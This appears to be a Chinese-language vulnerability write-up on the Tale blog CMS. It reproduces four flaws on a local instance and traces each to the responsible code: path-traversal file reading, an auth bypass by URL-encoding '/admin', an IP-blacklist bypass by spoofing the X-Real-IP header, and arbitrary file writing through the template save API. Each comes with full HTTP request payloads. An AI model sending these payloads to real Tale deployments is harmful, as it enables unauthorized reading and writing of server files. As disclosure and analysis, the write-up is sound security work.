环境搭建
https://gitee.com/hellokaton/tale
下载安装包 运行 Application
data:image/s3,"s3://crabby-images/4632c/4632c4338117eb80fa5aeb7f8ecb59b697f3d98d" alt=""
访问 127.0.0.1:9000
data:image/s3,"s3://crabby-images/69dc0/69dc039f3e76fa54c816197d960cb46eceb21644" alt=""
漏洞复现与分析
未授权任意文件读取
构造数据包
GET /%61dmin/template/content?fileName=/../../../../../pom.xml HTTP/1.1
Host: 127.0.0.1:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-CSRF-TOKEN: JDJhJDEyJGt0NzBwLnphVzFacnNZLjBkWGsyVk8zOXJST1U5dWV5ZVJWblVtTmpaUG5HNFRrbEFDa2pP
X-Requested-With: XMLHttpRequest
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:9000/admin/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
读取到项目中的 pom 文件
data:image/s3,"s3://crabby-images/453a3/453a3982540daa119edb059c8c36fabdc7525297" alt=""
com.tale.controller.admin.PagesController#getContent
data:image/s3,"s3://crabby-images/87d3d/87d3de40a6b2fc69698a18073d6eccaa494ccb46" alt=""
通过 GET 方式获取到参数 fileName 的值未经处理就拼接到 filePath 中 最后利用 readAllLines 读取到文件内容
java.util.List
data:image/s3,"s3://crabby-images/18eef/18eef676f76340d450c8fcf2f98d15a5f31e7cb9" alt=""
逻辑漏洞--全局越权
构造数据包
GET /%61dmin/api/logs HTTP/1.1
Host: 127.0.0.1:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:9000/admin/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
成功越权执行读取 logs 文件的操作
data:image/s3,"s3://crabby-images/2d69e/2d69e3315826f2e703828dc89b513560ff838e2f" alt=""
data:image/s3,"s3://crabby-images/72e36/72e36c42ce8d5c97844661af5a929222bd64b8ce" alt=""
在处理权限校验的时候,会根据 url 是否为 "/admin" 以及不是 "/admin/login" 时会判断用户是否是登录状态,但是通过编码就绕过了这样的校验,可以实现全局越权执行任意功能。
data:image/s3,"s3://crabby-images/dc104/dc1042525420e6ba91906b509398eb854133c07e" alt=""
逻辑漏洞--绕过黑名单检验
登录后台后,在系统管理处添加黑名单 ip 地址 127.0.0.1
data:image/s3,"s3://crabby-images/f287f/f287f3ad777565bcf289bed96b13bb037666222d" alt=""
再次访问系统时会提示已经被拉入黑名单
data:image/s3,"s3://crabby-images/65bd8/65bd85f649b597817689640812feea06ad5b8567" alt=""
data:image/s3,"s3://crabby-images/8af14/8af149f875f5fd08d4f962f4bfa81659c3384da5" alt=""
在数据包中添加字段 X-Real-IP
GET /%61dmin/api/logs HTTP/1.1
Host: 127.0.0.1:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:9000/admin/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
X-Real-IP:127.1.1.1
Connection: close
data:image/s3,"s3://crabby-images/283ec/283ecfd5546c2ca9ab717c7e188f66a7eb107439" alt=""
绕过了黑名单的校验
com.tale.hooks.BaseWebHook#before
data:image/s3,"s3://crabby-images/1bbce/1bbce34550de3ccd228bbd921a7c1de673cbcd84" alt=""
com.blade.mvc.http.Request#address
data:image/s3,"s3://crabby-images/a2fdf/a2fdf83fd121f28b5e4c053b8f4797bcde87dcde" alt=""
com.blade.kit.WebKit#ipAddress
data:image/s3,"s3://crabby-images/3cd65/3cd6591f112b8b7e5a53513fee5916cb18c17d76" alt=""
会优先获取从这些字段中读取到的 ip 地址,所以就绕过了黑名单的校验
任意文件上传/任意文件写入
登录后构造数据包
POST /admin/api/template/save HTTP/1.1
Host: 127.0.0.1:9000
Content-Length: 54
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: JDJhJDEyJHRqODNiZUZtMWZmN25QWTFZS09lU2VoNDBIcWlVQVJoVEl4VWhKUHZQellaeHFVUFFvclh5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept: */*
Origin: http://127.0.0.1:9000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:9000/admin/attaches
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSION=1b6t293u9gibfr32frrdb9h2du
X-Real-IP:127.1.1.1
{"fileName":"../../../../../1.txt",
"content":"test"}
data:image/s3,"s3://crabby-images/71b05/71b05db0f405c1ba4a3b04511ebda5fef7dd4ad9" alt=""
成功在项目根目录下写入文件
data:image/s3,"s3://crabby-images/8237c/8237cf9778cb969de70e6b3bc246725606749fcd" alt=""
com.tale.controller.admin.AdminApiController#saveTpl
data:image/s3,"s3://crabby-images/7321c/7321c918d11f8fe4b49a744ac97885ea9ee598e2" alt=""
data:image/s3,"s3://crabby-images/4d239/4d2394bbce8c4308c9564ed7c6ef1031ce825906" alt=""
根据传入的参数 fileName 为设定的文件名 content 为文件内容,未经校验就拼接到参数中,最终实现任意文件上传。